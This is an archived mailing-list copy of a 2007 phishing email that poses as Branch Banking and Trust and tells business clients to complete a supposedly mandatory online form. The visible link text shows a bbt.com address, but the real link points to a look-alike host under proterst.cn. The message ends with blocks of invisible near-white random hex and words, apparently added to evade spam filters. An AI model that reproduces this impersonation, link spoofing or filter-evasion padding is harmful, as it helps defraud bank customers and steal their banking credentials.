[87815] in cryptography@c2.net mail archive
Software Updating! (message id: S67009011527HA)
daemon@ATHENA.MIT.EDU (Branch Banking and Trust)
Tue May 8 17:18:41 2007
From: "Branch Banking and Trust" <clientcare.ref91560366304.cm@bbt.com>
To: "Crypto.discuss" <crypto.discuss@bloom-picayune.mit.edu>
----UJ2BCVM0BU.IH4UI5CUGHJG7
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<p ><font face="Arial">Dear BB&T business online client:</p>
<p ><font face="Arial">The BB&T Customer Service requests you to complete the BB&T Business Online Client Form.</p>
<p ><font face="Arial">This procedure is obligatory for all business and corporate clients of BB&T.</p>
<p ><font face="Arial">Please select the hyperlink and visit the address listed to access the BB&T Business Online Client Form.</p>
<p ><font face="Arial"><u><a href="http://clientform.ref59497914.bbt.com.proterst.cn/clients/data/proc.jsp">http://clientform.ref59497914.bbt.com/clients/data/proc.jsp</a></u></p>
<p ><font face="Arial">Again, thank you for choosing BB&T for your business needs. We look forward to working with you.</p>
<p ><font face="Arial">***** Please do not respond to this email *****</p>
<p ><font face="Arial">This mail is generated by an automated service.<br> Replies to this mail are not read by BB&T customer service or technical support.</p>
<p >-----------------------------------------------------------------------------------------------------------</p>
<p><font color="#FFFFF0" >0x19283208 9M1, create, 0AI2 0x591, 0x9546, 0x576, 0x1, 0x14671766, 0x61, 0x203, 0x66086604, 0x4 hex: 0x8, 0x29, 0x504, 0x0551, 0x33, 0x3808, 0x30427089, 0x9165, 0x33733000, 0x72274523, 0x47, 0x46419907, 0x0 0x46173304, 0x44, 0x27190558, 0x9441, 0x1811, 0x73 7JVH: 0x56600857, 0x0802, 0x6376, 0x6, 0x5, 0x7, 0x13556713, 0x95976258, 0x035, 0x9, 0x82738708, 0x1, 0x07, 0x5530, 0x28 0x96, 0x088, 0x1, 0x1, 0x466, 0x42119156, 0x192 LMK: 0x9, 0x7102, 0x43, 0x19, 0x2, 0x6881, 0x95, 0x4, 0x40, 0x081, 0x613 0x17, 0x3, 0x263, 0x03624957, 0x1111, 0x41, 0x751, 0x532, 0x5857, 0x4, 0x741, 0x677, 0x21, 0x8853</font></p><p><font color="#FFFFFA" ><span>SGP: 0x6, 0x077, 0x587, 0x79, 0x593, 0x3959, 0x0308, 0x29, 0x8, 0x1, 0x58, 0x7708, 0x91, 0x3, 0x707 0x1309, 0x6, 0x96001913, 0x353, 0x372, 0x86, 0x38906526, 0x744, 0x62, 0x0148, 0x646, 0x486, 0x0, 0x88514557, 0x4 api: 0x16706809, 0x20, 0x256, 0x98049763, 0x4, 0x95, 0x7, 0x2918, 0x80 stack, rev, DQG, LUV, rev, RAP 0x663, 0x5058, 0x38, 0x1919, 0x460, 0x82795943, 0x9 engine: 0x8, 0x9343, 0x10692769, 0x3566, 0x193, 0x56, 0x1464, 0x085, 0x6569, 0x1, 0x7580, 0x515, 0x6173 </span><span>3IFD 8RF W21C 1RCU update DDHN 0x50, 0x15110680, 0x82686774, 0x5, 0x4832, 0x50, 0x42, 0x456, 0x07, 0x410, 0x810, 0x37933283, 0x861, 0x91188817 0x78700492, 0x34862042, 0x6447 0x5091, 0x38618122, 0x67249526, 0x8168, 0x20145526, 0x6844, 0x67, 0x2496, 0x45306762, 0x20691792, 0x12, 0x7596, 0x8</span></font></p>
<p><font color="#FFFFF5" ><span>cvs: 0x527, 0x47, 0x68819155, 0x0, 0x33, 0x6277, 0x4, 0x8, 0x31382335, 0x9617, 0x7 0x4507, 0x602, 0x657, 0x4610, 0x1935, 0x03, 0x460, 0x6457, 0x69, 0x0996 interface: 0x5, 0x053, 0x6, 0x92, 0x3109, 0x06, 0x34928191 KAYF: 0x3161, 0x1 YYD KMU</span><span>media: 0x45995279, 0x135, 0x64757286, 0x56, 0x0813, 0x58, 0x700, 0x7, 0x5, 0x3, 0x42, 0x18, 0x76 </span><span>close: 0x5, 0x58, 0x791, 0x8, 0x73 0x8, 0x3656, 0x4166, 0x26430800, 0x15, 0x0, 0x47, 0x21, 0x448, 0x7, 0x3605, 0x476, 0x634 include, common, LIRJ, stack, YDQP, IX14, source, MFG9. KRPL: 0x66, 0x48, 0x656, 0x3, 0x53, 0x538, 0x958, 0x35, 0x46, 0x133, 0x7, 0x7, 0x523, 0x42</span></font></p>
</body>
</html>
----UJ2BCVM0BU.IH4UI5CUGHJG7--